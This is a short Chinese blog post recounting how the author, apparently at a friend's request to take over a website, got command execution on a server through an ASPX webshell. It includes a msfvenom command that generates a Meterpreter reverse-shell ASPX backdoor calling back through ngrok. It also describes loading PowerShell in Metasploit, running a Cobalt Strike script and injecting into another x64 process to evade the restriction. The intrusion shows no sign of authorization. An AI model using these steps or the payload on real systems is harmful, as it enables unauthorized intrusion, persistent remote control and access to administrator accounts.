记一次绕过aspx禁止执行命令
前言
某友扔了个zhan给我,叫我帮他提。后面遇到不能执行命令的问题,百度上的试了之后发现也不行。后面问了su su,叫我执行powershell,后面折腾了一会解决了能执行命令的问题。
过程
执行命令如下返回
根据某文章执行操作
关于webshell中的cmd的权限提升
最后面还是无法执行,后面去问susu。让我操作一波powershell看看,后面我就用
ngrok+msf反弹到本地
生成apsx的后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ngrok的IP> LPORT=<ngrok的端口> -f aspx > demo.aspx
msf接收到shell之后,
load powershell
可以执行powershell里的命令,尝试执行cs生成的powershell command,还是不行
后面用cs生成了一个ps1,上传到shell目录下。然后用ps执行脚本
cobalstrike
后面回到cs发现还是不能执行命令,后面尝试注入到其他进程回连看看能不能执行命令,没想到真的可以(由于当时没有截图,这里就说一下要注意的)
要注意的是,要注入一个 x64位的进程,而且不能是当前用户名的进程即可
后面在菜刀中翻到管理员添加的账号
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:记一次绕过aspx禁止执行命令
本文作者:九世
发布时间:2019-08-16, 16:22:06
最后更新:2019-08-16, 20:25:32
原始链接:http://jiushill.github.io/posts/2f92e5fe.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。